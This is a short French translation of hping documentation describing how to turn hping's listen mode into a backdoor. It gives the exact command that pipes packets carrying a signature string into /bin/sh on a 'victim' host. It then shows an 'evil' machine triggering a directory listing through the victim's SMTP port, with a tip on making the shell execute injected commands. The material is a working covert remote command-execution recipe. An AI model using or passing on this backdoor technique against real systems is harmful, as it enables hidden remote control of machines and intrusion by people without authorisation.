1: hping peut être utilisé comme une backdoor (ndt : porte dérobée). Essayez
2: juste l'option -9 (--listen) et redirigez via un tube dans /bin/sh :
3:
4: Mettez hping en mode listen (ndt : d'écoute) sur le système victime.
5:
6: victim# hping -I eth0 -9 mysign | /bin/sh
7:
8: Chaque paquet qui contient "mysign" sera traité par hping, tous les octets
9: qui suivent "mysign" dans les paquets seront envoyés dans la sortie
10: standard, ainsi par exemple je serai capable d'exécuter des commandes en
11: utilisant tous types de protocoles. Juste pour exemple je peux utiliser le
12: démon smtpd pour exécuter 'ls' sur la victime.
13:
14: evil$ telnet victim 25
15:
16: Trying 192.168.1.1...
17: Connected to nano (192.168.1.1).
18: Escape character is '^]'.
19: 220 nano.marmoc.net ESMTP Sendmail
20: mysignls;
21:
22: sur la victime vous verrez :
23:
24: victim# hping -I eth0 -9 mysign | /bin/sh
25: hping2 listen mode
26: bin cdrom etc home local-home mnt root tmp var
27: boot dev export lib lost+found proc sbin usr
28: : command not found
29:
30: Comme vous pouvez le voir j'utilise 'ls;' puisque sinon le shell recevra
31: juste ls^M. Le ";" force l'exécution de la commande (du moins avec bash et
32: zsh, vérifiez votre shell pour plus d'informations).
33:
34: Ceci fonctionne avec tous les types de paquets IP valides non filtrés, le
35: niveau supérieur de protocole importe peu.
36:
37: antirez <antirez@invece.org>
FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>